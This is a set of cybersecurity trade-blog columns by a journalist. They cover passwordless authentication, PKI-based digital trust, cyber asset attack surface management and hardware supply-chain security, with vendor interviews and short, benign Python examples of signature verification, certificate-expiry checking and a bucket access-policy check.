This is one giant leap towards getting rid of passwords entirely. Perhaps not coincidently, it comes at a time when enterprises have begun adopting passwordless authentication systems in mission-critical parts of their internal operations.

Excising passwords as the security linchpin to digital services is long, long overdue. It may take a while longer to jettison them completely, but now there truly is a light at the end of the tunnel.

I recently sat down with Ismet Geri, CEO of Veridium, to discuss what the passwordless world we’re moving towards might be like. For a full drill down on our wide-ranging discussion, please give a listen to the accompanying podcast. Here are a few takeaways.

Security + efficiency

Passwordless technology is certainly ready for prime time; innovative solutions from suppliers like Cisco’s Duo, Hypr, OneLogin and Veridium have been steadily gaining traction in corporate settings for the past few years.

And the pace of adoption is quickening, Geri told me. Companies in the throes of digital transformation, and especially post Covid-19, have never been more motivated to adopt a new authentication paradigm – one that eliminates shared secrets.

Password abuse at scale arose shortly after the decision got made in the 1990s to make shared secrets the basis for securing digital connections. Fortifications, such as multi-factor authentication (MFA) and password managers, proved to be mere speed bumps. Threat actors now routinely bypass these second-layer security gates.

No small part of the problem is that passwords and MFA require a significant amount of human interaction. “Relying on shared secrets doesn’t work anymore, because we have too many accounts and no one can remember hundreds of passwords,” Geri says. “Our brains just won’t do it.”

As companies accelerate their dependence on hosted cloud services, the clunkiness of passwords and MFA is exacting a toll on productivity. One bank in the U.S. Northeast, for instance, was concerned about tellers having to type-in their passwords 50 or more times a day. “They wanted to make their tellers’ work life easier, more friendly and seamless, and at the same time improve security,” Geri says.

This was accomplished by using web cameras at each terminal tied into Veridium facial recognition software. Instead of the teller having to type in a username and password, then also use a second-factor of authentication over and over, access now happens silently and swiftly based on who the teller is. Thus, the bank measurably reduced its exposure to password abuse, while also lightening the burden on each teller.

Adoption scenarios

Geri

Outside of the banking industry, which strictly prohibits the use of BYOD smartphones for tellers, many organizations have begun adopting passwordless solutions by leveraging their employees’ personally-owned smartphones. Passwordless access to company resources goes something like this: Instead of a logon prompt asking for a username and password, the employee gets presented with a QR Code.

He or she simply uses his or her smartphone to scan the QR code. A phone app then uses the onboard biometric sensor, either fingerprint or facial, to authenticate the employee to the company’s server. “The most common adoption scenario that we see is companies seeking a passwordless experience across all of their applications,” Geri says.
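
Greatly simplified, and not Veridium’s or FIDO’s actual protocol, that flow can be sketched as a challenge-response exchange: the server issues a one-time challenge (this is what the QR code would carry), the phone signs it with a device-bound private key unlocked by the biometric, and the server verifies the signature against the public key enrolled for that employee. The sketch below uses the Python cryptography package (assumed installed).

```python
import secrets

from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

# Enrollment: the phone generates a key pair; the server stores the public key.
phone_key = Ed25519PrivateKey.generate()
server_enrolled_public_key = phone_key.public_key()

# Login: the server issues a random one-time challenge (carried by the QR code).
challenge = secrets.token_bytes(32)

# Phone: in a real system the biometric unlock happens here, then the key signs.
signature = phone_key.sign(challenge)

# Server: verify the signature against the enrolled public key.
try:
    server_enrolled_public_key.verify(signature, challenge)
    print("access granted without any password")
except InvalidSignature:
    print("access denied")
```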

Talk about turning Bring Your Own Device security concerns on its head. Passwordless solutions now enable companies to turn BYOD into a strategic tool. When you consider how password abuse has grown into a full-blown criminal specialty, it’s easy to measure the security gained from shutting down password abuse vectors.

The efficiency gain comes from reducing logon sprawl; today employees are required to repeatedly type-in a username and password, then also use various forms of MFA to connect to the company network, to log onto cloud-hosted productivity and collaboration tools, as well as to access operational software.

Coming advances

In short, what’s happening is that companies are shifting to passwordless authenticators because they materially improve security, but also leverage tools like a smartphone which is far less likely to be left behind or misplaced.

Google, Microsoft and Apple now get this. After a decade of sitting on the fence, the tech giants on May 5 announced that they would formally adopt standards pulled together by the FIDO Alliance.

FIDO stands for Fast IDentity Online. It’s a fresh set of industry standards, akin to WiFi and Bluetooth, that encourages the development and use of passwordless authenticators. Any device manufacturer, software developer or online service provider can integrate FIDO protocols and policies into their products and services.

Whatever their ulterior motives, Google, Microsoft and Apple should be congratulated for finally seeing the light. They’ve dispatched spokesmen to herald “eliminating the vulnerability of passwords,” tout “making passwordless part of consumer lives” and promise “completing the shift to a passwordless world.” Maybe the tech giants finally noticed the train leaving and thought it wise to jump on board.

For its part, Veridium launched in 2016 with a laser focus on designing passwordless systems from scratch that directly addressed the growing frustration of IT department and security team leaders.

Attaining ‘recognition’

Geri told me that Veridium is already three years into development of a major advance – technology that can take into account behavioral biometrics, such as the pattern of hand movement a person habitually uses when using a fingerprint or iris sensor.

By remembering nuances about movements and other behavior traits over time, this technology will make Veridium’s platform swifter and surer about authenticating a user, Geri told me.

“It’s a concept I call recognition,” he says. “Behavior patterns combined with a strong authentication asset, which is your biometrics, could get us very close to starting to recognize you.”

More such advances are coming. How they get used in a global sense remains to be seen.

Will passwordless authenticators serve mainly to tighten the iron grip that the social media giants hold on consumers’ online personas? Or could these advances foster a fresh trend, one that supports a more fair distribution of wealth, say like the mainstreaming of self-sovereign identities? We’re destined to soon find out. I’ll keep watch and keep reporting.

Acohido

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.

Modern digital systems simply could not exist without trusted operations, processes and connections. They require integrity, authentication, trusted identity and encryption.

Related: Leveraging PKI to advance electronic signatures

It used to be that trusting the connection between a workstation and a mainframe computer was the main concern. Then the Internet took off and trusting the connection between a user’s device and a web server became of paramount importance.

Today we’re in the throes of digital transformation. Software-defined-everything is the order of the day. Our smart buildings, smart transportation systems and smart online services are all network-connected at multiple levels. Digital services get delivered across a complex amalgam of public cloud, hybrid cloud and on-premises digital systems.

It is against this backdrop that digital trust has become paramount. We simply must attain — and sustain — a high bar of confidence in the computing devices, software applications and data that make up the interconnected world we occupy.

And yet at this moment, digital trust isn’t where it needs to be on the boardroom priority list or the IT security team’s strategy. It remains all too common for threat actors to subvert connected ecosystems. This challenge has not escaped the global cybersecurity community. Largely out of the public’s eye, technologists from the private and public sectors are fully engaged in shaping the elements of digital trust that will safeguard our connected future.

Protocols and policies setting new parameters for trusted connections are being hammered out and advanced encryption, authentication and data protection solutions are being ramped up.

Failure is not an option. These efforts must result in a level of digital trust significantly higher than we have today if we are to have full confidence in digital services, going forward.

This was the main topic of discussion recently at DigiCert Security Summit 2022. I had the chance to talk about DigiCert’s perspective with Jason Sabin, DigiCert’s Chief Technology Officer.

We discussed why elevating digital trust has become so vital. Here are a few key takeaways.

Trust under siege

Long gone are the days when a security team mainly had to be concerned about network connections getting made internally, on company-owned equipment, or externally, across a VPN connection or a public-facing webpage.

Today, software developers are king and agile software is their golden chalice. Developers stitch together modular microservices and software containers that tap into far-flung software-defined resources. This results in ephemeral connections firing off at a vast scale — humans-to-software and software-to-software — all across the Internet and the cloud.

Trust is under siege. The challenge faced by a security team is to verify the authenticity of each connection and preserve the encryption, as needed, across a massive, sprawling attack surface.

And this is where digital trust comes in, with core implementations such as public key infrastructure (PKI), Sabin noted. PKI is the framework by which digital certificates get issued to authenticate the identity of users and devices; and it is also the plumbing for encrypting data that moves across the public Internet.

Most folks come into contact with the most visible subset of PKI — the TLS/SSL/HTTPS authentication and encryption protocol – each time they connect to a secured website.

However, PKI has engrained itself much more pervasively than that across the digital landscape. Over the past decade or so, companies have turned to using PKI to certify and secure many types of digital connections inside their private networks, as well.

Consider that just five years ago, a large enterprise was typically responsible for managing tens of thousands of digital certificates. Today that number for many organizations is pushing a million or more digital certificates, as digital transformation accelerates.
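
One small but telling slice of managing certificates at that scale is simply knowing when each one expires. Here is a hedged Python sketch that connects to a host, reads the TLS certificate it serves and reports days until expiry; the hostnames are placeholders.

```python
import socket
import ssl
from datetime import datetime, timezone

# Placeholder hostnames; in practice this list comes from a certificate inventory.
HOSTS = ["www.example.com", "www.example.org"]

def days_until_expiry(host: str, port: int = 443) -> int:
    """Connect to the host, read its TLS certificate and return days to expiry."""
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=10) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            cert = tls.getpeercert()
    expires_epoch = ssl.cert_time_to_seconds(cert["notAfter"])
    expires = datetime.fromtimestamp(expires_epoch, tz=timezone.utc)
    return (expires - datetime.now(timezone.utc)).days

if __name__ == "__main__":
    for host in HOSTS:
        print(f"{host}: certificate expires in {days_until_expiry(host)} days")
```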

“There’s a massive shift unfolding very, very quickly,” Sabin told me.  “Trust has become the backbone of security and, as a result, companies are leveraging PKI technology to implement trust in all parts of their ecosystem, which basically comes down to issuing and managing a lot of digital certificates.”

Protocols, policies and PKI

The question then becomes: Is PKI robust enough to support the elevated level of digital trust that’s needed?

DigiCert and other security experts essentially argue that the answer is: PKI is ubiquitous, time tested and well-suited to leveraging automation. It can form a foundation of a larger digital trust strategy.

DigiCert, for instance, supplies advanced PKI management systems that can authenticate the identity of an individual, a business, a machine, a workload, a software container or a microservice. And automation already is being leveraged to assure that an object hasn’t been tampered with, as well as ensure the encryption of data in transit – at scale.

Advanced data security technologies, no matter how terrific, are just one piece of the puzzle. The security experts and thought leaders at DigiCert’s conference discussed the progress being made on a couple of other fronts: protocols and policies.

In order to achieve a level of digital trust needed to support great leaps forward, a fresh set of technical protocols, compliance benchmarks and supporting audits remain to be finalized and implemented.

The model for driving consensus of this sort has been laid out by the industry forums and consortiums that convened to give us the protocols and policies undergirding the public Internet. Many of these same groups, like the CA/Browser Forum, which focuses on benchmarks for digital certificates, remain active and are hashing out new rules of the road.

Sabin

“We have to think about how to extend trust to mobile devices and to IoT devices, and how to more effectively protect supply chains and critical infrastructure,” Sabin says. “We also must find ways to encourage high levels of compliance with industry standards and government regulations. This is all part of building trusted digital ecosystems.”

Everyone should realize what’s at stake here: smarter buildings, autonomous transportation systems, climate change remediation, medical breakthroughs.

As people spend larger chunks of their waking hours online, the boundary between personal and work connectivity has become fluid. Companies need to come to view digital trust as a strategic imperative.

This challenge speaks to verifying the integrity of homespun and third-party software builds, firmware on connected devices and their trusted access, trustworthiness of documents and much more, Sabin says.

I agree.  And I’m encouraged that the work of prioritizing digital trust is well underway. I’ll keep watch and keep reporting.

Acohido

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.


(LW provides consulting services to the vendors we cover.)

 

The shift to software-defined everything and reliance on IT infrastructure scattered across the Internet has boosted corporate productivity rather spectacularly.

Related: Stopping attack surface expansion

And yet, the modern attack surface continues to expand exponentially, largely unchecked. This dichotomy cannot be tolerated over the long run.

Encouragingly, an emerging class of network visibility technology is gaining notable traction. These specialized tools are expressly designed to help companies get a much better grip on the sprawling array of digital assets they’ve come to depend on. Gartner refers to this nascent technology and emerging discipline as “cyber asset attack surface management,” or CAASM.

I sat down with Erkang Zheng, founder and CEO of JupiterOne, a Morrisville, NC-based CAASM platform provider, to discuss how security got left so far behind in digital transformation – and why getting attack surface management under control is an essential first step to catching up.

For a full drill down, please give the accompanying podcast a listen. Here are my takeaways:

Shoring up fast-and-risky

For most of the past 25 years, company networks were made up of clearly defined internal boundaries encompassed by a hard-and-fast perimeter. And the role of the security team was straightforward: defend the network, protect IT.

But then along came digital transformation. Internal and external network boundaries gave way to agile software development and everything-as-a-hosted-service. Organizations today move as fast as they can, expect to break things and count on iterating improvements on the fly. Fast-and-risky has become the working definition of software innovation.

Rock star developers in cutting-edge organizations are encouraged to make things happen. They live and die by the tenets of open-source and DevOps and lean on cloud-native IT infrastructure. Accelerating complexity has been the result.

The problem with following the fast-and-risky mantra is that many failures turn out to be architectural in nature, are not easy to fix and can all too easily escape notice or, worse, be ignored. Meanwhile, security teams, for the most part, have been stuck in a legacy mindset of striving to keep things as simple and as consistent as possible, Erkang observes.

And this, he argues, is where threat actors foment chaos. It seems ludicrous, but in one sense it’s easier than ever for malicious hackers to get deep access, steal data, spread ransomware, disrupt infrastructure and gain long-run unauthorized access.

Zheng

“There’s a fundamental disconnect between what the business wants and what the security team wants,” Erkang told me. “And this is where the chaos comes from . . . the bad guy hackers aren’t necessarily taking advantage of the complexity; they’re really taking advantage of this disconnect.”

Embracing complexity

The opportunity, going forward then, is for security to jump fully onboard the digital transformation bandwagon.

Legacy defenses at the gateway, firewall, endpoint and application levels must be rearchitected and scaled-up. That’s what a passel of emerging security frameworks like Zero Trust Network Access (ZTNA), Cloud Workload Protection Platform (CWPP), Cloud Security Posture Management (CSPM) and Secure Access Service Edge (SASE) are all about. Network security must be architected to effectively blunt non-stop malicious probing and cut off the breaches enabled in a fast-and-risky operating environment.

At the same time, the expansion of the attack surface somehow needs to be slowed — and ultimately reversed. And this is where CAASM technology and practices come in – by fostering cyber hygiene on the ground floor.

Erkang is in the camp making the argument that security teams have an opportunity to lead the way by not merely tolerating complexity but by embracing it. “Security needs to focus on supporting innovation and advancement by understanding complexity; this is now possible with data, with automation and with an engineering mindset,” he says.

Anything and everything that supports any element of digital operations ought to be considered a cyber asset that needs constant care and feeding — with security top of mind, he says. CAASM technology leverages APIs to make it possible for security teams to impose context on the ephemeral connections flying between things like microservices, virtual storage and hosted services.

With context, granular policies can then be set in place and enforced. Machine learning and automation can be brought to bear in a way that infuses security without unduly hindering agility. A lot can be gained by simply imposing wise configuration of all cyber assets, Erkang says. What’s more, this same level of granular analysis and policy enforcement can — and should — be directed at identifying, monitoring and patching software vulnerabilities, he argues.

Taking the security angle

In one sense, taming complexity is all about understanding context. Erkang makes a strong argument that the best way for an organization to gain actionable understanding of its cyber assets in a fast-and-risky operating environment is to come at it from the security perspective.

Erkang gave me the example of a company seeking to take stock of its cloud data stores. Let’s say an organization wants to more proactively manage its Amazon Web Services S3 buckets. JupiterOne, in this scenario, would assemble and maintain a detailed catalogue of the configuration status of all these assets.

Granular policies could then be enforced that consider the sensitivity of data held in any given S3 bucket, as well as the associated access privileges. These are privileges that often are allowed by default to cascade across several tiers of user groups — in support of the go-fast-and-break mindset. Tightening these privileges with just the right touch shrinks the attack surface.
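
Here is a hedged sketch of what such a granular, context-aware policy check might look like (not JupiterOne’s actual query language): each bucket asset carries its data sensitivity and the groups that can read it, and policy says sensitive buckets must not be readable by broad, cascading groups. All names are hypothetical.

```python
# Hypothetical broad user groups whose access tends to cascade by default.
BROAD_GROUPS = {"all-engineering", "all-employees"}

# Hypothetical asset inventory entries for two S3 buckets.
assets = [
    {"name": "customer-exports", "sensitivity": "high", "readable_by": {"data-platform", "all-engineering"}},
    {"name": "public-web-assets", "sensitivity": "low", "readable_by": {"all-employees"}},
]

def policy_violations(assets):
    """Return sensitive buckets whose read access includes a broad group."""
    return [
        asset["name"]
        for asset in assets
        if asset["sensitivity"] == "high" and asset["readable_by"] & BROAD_GROUPS
    ]

if __name__ == "__main__":
    for name in policy_violations(assets):
        print(f"tighten access on '{name}': sensitive data exposed to broad groups")
```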

According to Gartner, CAASM capabilities can help companies “improve basic security hygiene by ensuring security controls, security posture and asset exposure are understood and remediated across the environment.”

It strikes me that the beauty of this is that improving visibility is about more than creating operational effectiveness; strengthening security and lowering risk for organizations also paves the way for more effective cyber asset management.

“Security needs to transform from an enforcing function to a business enabling and a wellness function,” Erkang says. “Understanding your cyber assets and how all the dots connect can be the starting point to proactively manage different functions, not just within security, but also outside of security, as well.”

It’s notable that an unprecedented number of fresh security frameworks are vying for traction at the moment. For company decision-makers, this can be confusing. But the effort to sort things out and determine what works best for their organization is well worth it. This is all part of raising the security bar. CAASM could be a cornerstone. I’ll keep watch and keep reporting.

Acohido

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.


(LW provides consulting services to the vendors we cover.)

Defending companies as they transition to cloud-first infrastructures has become a very big problem – but it’s certainly not an unsolvable one.

Coming Wed., May 18: How security teams can help drive business growth — by embracing complexity. 

The good news is that a long-overdue transition to a new attack surface and security paradigm is well underway, one built on a fresh set of cloud-native security frameworks and buttressed by software-defined security technologies.

It strikes me that the security systems we will need to carry us forward can be divided into two big buckets: those that help organizations closely monitor network traffic flying across increasingly cloud-native infrastructure and those that help them keep their critical system configurations in shipshape.

There’s a lot percolating in this second bucket, of late. A bevy of cybersecurity vendors have commenced delivering new services to help companies gain visibility into their cyber asset environment, and remediate security control and vulnerability gaps continuously. This is the long-run path to slowing the expansion of a modern attack surface.

“The challenge is that cyber assets are exploding out of control and security teams are having a hard time getting a grasp on what’s going on,” says Erkang Zheng, founder and CEO of JupiterOne, a Morrisville, NC-based asset visibility platform. “But at the same time, because everything is now software-defined, we actually can approach this problem with a data-driven and an automation-driven mechanism.”

JupiterOne is in a group of cybersecurity vendors that are innovating new technology designed to help companies start doing what they should have done before racing off to migrate everything to the cloud. What happened was that digital transition shifted into high gear without anyone giving due consideration to the security gaps they were creating.

The need to start doing this is glaring, so the rise of specialized technology to get it done is a welcome development.

Indeed, research firm Gartner very recently created yet another cybersecurity acronym for this emerging class of asset visibility platforms and practices: cyber asset attack surface management, or CAASM. Gartner lists JupiterOne, Brinqa, AirTrack Software, Axonius, Panaseer and Sevco Security as leading suppliers of CAASM systems.

The common denominator among CAASM vendors is that they provide a centralized platform that can help companies attain meaningful, actionable visibility of their system configurations and vulnerability patching — across the breadth of their cloud-native, hybrid-cloud, and multi-cloud networks.

There’s really no longer any excuse for any organization to lack visibility into how its cyber assets are intermeshing, moment to moment, and whether this is occurring according to established best practices.

I’ve had a couple of deep discussions with JupiterOne about this. A drill-down is coming tomorrow in a news analysis column and podcast. Stay tuned.

Acohido

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.


(LW provides consulting services to the vendors we cover.)

It’s a scenario executives know too well.

Related: Third-party audits can hold valuable intel

You and your cybersecurity team do everything correctly to safeguard your infrastructure, yet the frightening alert still arrives that you’ve suffered a data breach.

It’s a maddening situation that occurs far more often than it should.

One of the main culprits behind these incredibly frustrating attacks has less to do with how a team functions or the protocols a company employs than with procurement: supply-chain shortcomings and the hard-to-detect vulnerabilities layered into a particular device.

“The same technologies that make supply chains faster and more effective also threaten their cybersecurity,” writes David Lukić, a privacy, security, and compliance consultant. “Supply chains have vulnerabilities at touchpoints with manufacturers, suppliers, and other service providers.”

The inherent complexity of the supply chain for modern technology is a reason why so many cybercrime attempts have been successful. Before a device reaches the end user, multiple stakeholders have contributed to it or handled it. CPUs, GPUs, drives, network controllers, and peripherals can each originate at a different supplier.

Then there are firmware developers, transport agencies, testing facilities, and security evaluation agencies that handle the device before it is sent to the corporate client. From there, operations staff, audit staff, and IT department personnel are likely to handle the device before it finally makes its way into the hands of the intended operator.

This complexity can be compounded by the effects of world events like COVID-19 or a war, resulting in manufacturing slowdowns and lockdowns. Such events have led to parts shortages that force the use of older and less-secure replacement parts to meet schedules, which emphasizes the need for innovation and for additional suppliers.

Lorenzo

As the European Union Agency for Cybersecurity (ENISA) puts it: “The chain reaction triggered by one attack on a single supplier can compromise a network of providers.” ENISA found that 66 percent of cyberattacks focus on the supplier’s code.

The vulnerabilities that accumulate along a device’s journey to the end user add up to increased risk. Cybersecurity experts like Lukić and the researchers at ENISA recommend that organizations limit the number of suppliers they contract with, develop a minimum standard for those with whom they engage, and verify a supplier’s code and security protocols before finalizing terms. But these tactics go only so far in protecting you, and the core problem remains.

There is the potential for a reliable solution that can bring some peace of mind, however. The Trusted Control/Compute Unit, or TCU, built by Axiado introduces an enhanced zero-trust model to the market.

This artificial intelligence-driven, chip-scale innovation offers multiple and hierarchical trust relationships for complex ownership structures and transitions. It provides an answer to the most common and dangerous forms of cybercrime:

•Security at the root.  With its proactive platform root-of-trust design, the TCU eliminates fragmentation and establishes safeguards for pre-boot, at-boot, and runtime stages of critical device components and functions.

•Anti-counterfeit, anti-theft, and anti-tampering features.  A ground-up solution, the TCU addresses supply-chain risks through a hierarchical infrastructure that accommodates multiple stakeholders and manages ownership transitions between them. The TCU’s capabilities encompass a depth and breadth of systems analysis and cutting-edge security management that locates and contains attacks.

•Threat detection.  The TCU deploys AI-based runtime threat-detection surveillance and remediation for enhanced tamper protection.

•Traceability and accountability.  With the TCU, networks have advanced forensic abilities to track digital activity and maintain system integrity.

The features of the TCU can greatly help to resolve the four most pressing concerns that can impact any company’s cybersecurity initiatives. The first major problem the TCU solves is in the area of data loss, modification, or exfiltration. These measures, enabled by security at the root and AI, protect users, devices, and network data.

A second problem area that the TCU addresses is failures or loss of system availability. The benefit of security at the root is that it protects systems from crippling firmware attacks that can severely compromise, or even disable, them.

Third, the TCU mitigates the problem of reduced component availability. Control and management of system security can be offloaded from the main CPU and related processors to a TCU.

This allows flexibility to use older components in times of supply shortages as we’ve experienced during COVID-19 and other world events. The TCU offsets the security shortcomings in these alternative devices.

Finally, the TCU safeguards against reputation risk. A TCU-based solution preserves a company’s reputation by stopping unauthorized alterations or implants throughout a product’s lifecycle.  Maintaining a sterling reputation with vendors and suppliers is crucial to long-term success for individual companies and the ecosystems in which they operate.

The good news for executives and in-house cybersecurity experts is that there is finally a way to confidently mitigate relentless supply-chain attacks. Axiado’s single-chip solution reduces the complexity of integrating multiple parts while adding new layers of protection. The TCU addresses the supply-chain risks from counterfeits, substitutions, tampering, theft, and implants while adding accountability to the ownership process.

About the essayist: Josel Lorenzo is vice president of products at Axiado, which supplies advanced technologies to secure the hardware root of trust.